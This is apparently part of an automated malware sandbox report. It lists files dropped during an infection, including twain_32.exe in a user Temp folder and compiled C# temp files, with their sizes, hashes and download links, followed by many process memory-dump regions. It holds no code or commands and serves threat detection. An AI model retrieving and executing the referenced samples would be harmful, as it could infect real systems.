d88a8b553f99f796c80a9e7cc41534b43fab45c7b13fd1d52c9b580d541a272e

SHA512
e65cad2c807bf012d13842dac72bd2436d182702fc7bb7fb212487b322a9442504a7c1f42df57e760ac24c322b810ba8c2ffa616dd2acdfb8098bdb5e8012fe9

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o51qwjhf\o51qwjhf.0.cs

Filesize
362B

MD5
0fec98f8a1b436ebe959c31f3e6e8b22

SHA1
097b26615db848a62071ad1e1b5554e342098d0d

SHA256
7b54da8fb405f7def5abdbe6b21d531b9edae6a36c5e8b7c71ea73e93255d952

SHA512
2ee2a63248641ba227e4d1d827504a1fc490f05f01c3c9019aab781558d20c112f6b001ff99534e9d85e0a542425df4089d5be0e0d090cb17eaa88ec41cf9097

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o51qwjhf\o51qwjhf.cmdline

Filesize
235B

MD5
546ce33c5f554beaa285a8b3404ec903

SHA1
456934841b7f7a754768a8db194c0e649d01f8fc

SHA256
045bb98fd22a43042b7a6e59fe12a142a38823039d2b04252719645a48ed626c

SHA512
787b227674a8adf6ab3078abf9d5c49bc22f177a771f4763fc453b916190c722a1d574ae067bf3b53640f495cb4a440664917ae139fb1c75efd017b26bdd4091

Download Submit
\??\c:\Windows\System32\CSC1090B04C6D9E4F1BA7A1E161AD8F0D1.TMP

Filesize
1KB

MD5
fccbcfaf29fdccaabada579f7aaf3ae7

SHA1
f9b179b6aab6b96908d89b35aab3f503478a956d

SHA256
e70bc8ad14a70d490fe92ed86e79c40fc133a64428a2781e14514b16d83a9b02

SHA512
ac047b4ba060e72e224c1afdebbdafecbfd705a67cb8f0cd5c82bf7980c2baa23bdb5bf5d821836bc0c426069a61d8e112b45239887d2d81b8a6d4fa839c1e10

Download Submit
\Users\Admin\AppData\Local\Temp\twain_32.exe

Filesize
5.7MB

MD5
1ff26b7d334cd22e726caf72a4208b96

SHA1
d2a1ad17e27c01072ac41d4d20426dd5ca7554ad

SHA256
56ece6be060502193ed0360a8ff7d0633dc7e88d133b28b8a73dfb755d2134db

SHA512
787b02b048dad824dd216a0b33872b2012fc8b2c47d831a33c4eb05399df9a253bd30a8789659a7da0eea8535bb78705685ac67ae546d2f10210c7ba552b4f49

Download Submit
memory/432-217-0x0000000000AF0000-0x0000000000B11000-memory.dmp

Filesize
132KB

Download
memory/432-218-0x0000000000BC0000-0x0000000000BE7000-memory.dmp

Filesize
156KB

Download
memory/432-219-0x000007FEBF130000-0x000007FEBF140000-memory.dmp

Filesize
64KB

Download
memory/432-220-0x0000000037940000-0x0000000037950000-memory.dmp

Filesize
64KB

Download
memory/432-215-0x0000000000AF0000-0x0000000000B11000-memory.dmp

Filesize
132KB

Download
memory/476-227-0x0000000037940000-0x0000000037950000-memory.dmp

Filesize
64KB

Download
memory/476-226-0x000007FEBF130000-0x000007FEBF140000-memory.dmp

Filesize
64KB

Download
memory/476-225-0x00000000005E0000-0x0000000000607000-memory.dmp

Filesize
156KB

Download
memory/492-261-0x000007FEBF130000-0x000007FEBF140000-memory.dmp

Filesize
64KB

Download
memory/492-260-0x0000000000100000-0x0000000000127000-memory.dmp

Filesize
156KB

Download
memory/492-262-0x0000000037940000-0x0000000037950000-memory.dmp

Filesize
64KB

Download
memory/968-208-0x0000000077900000-0x0000000077AA9000-memory.dmp

Filesize
1.7MB

Download
memory/968-209-0x00000000777E0000-0x00000000778FF000-memory.dmp

Filesize
1.1MB

Download
memory/1032-102-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/1060-104-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/2164-206-0x0000000001E50000-0x0000000001E58000-memory.dmp

Filesize
32KB

Download
memory/2164-205-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/2192-171-0x0000000001250000-0x0000000001448000-memory.dmp

Filesize
2.0MB

Download
memory/2360-0-0x0000000000400000-0x0000000000B63000-memory.dmp

Filesize
7.4MB

Download
memory/2360-15-0x0000000000400000-0x0000000000B63000-memory.dmp

Filesize
7.4MB

Download
memory/2420-662-0x00000000011B0000-0x00000000011B8000-memory.dmp

Filesize
32KB

Download
memory/2600-198-0x000000013F7F0000-0x000000013FDB1000-memory.dmp

Filesize
5.8MB

Download
memory/2600-168-0x000000013F7F0000-0x000000013FDB1000-memory.dmp

Filesize
5.8MB

Download
memory/2828-41-0x00000000003D0000-0x00000000003DE000-memory.dmp

Filesize
56KB

Download
memory/2828-31-0x0000000000380000-0x000000000038E000-memory.dmp

Filesize
56KB

Download
memory/2828-29-0x0000000001260000-0x0000000001458000-memory.dmp

Filesize
2.0MB

Download
memory/2828-33-0x00000000003B0000-0x00000000003CC000-memory.dmp

Filesize
112KB

Download
memory/2828-35-0x0000000000460000-0x0000000000478000-memory.dmp

Filesize
96KB

Download
memory/2828-37-0x0000000000390000-0x000000000039E000-memory.dmp

Filesize
56KB

Download
memory/2828-39-0x00000000003A0000-0x00000000003AC000-memory.dmp

Filesize
48KB

Download
memory/2828-43-0x0000000000480000-0x000000000048C000-memory.dmp

Filesize
48KB

Download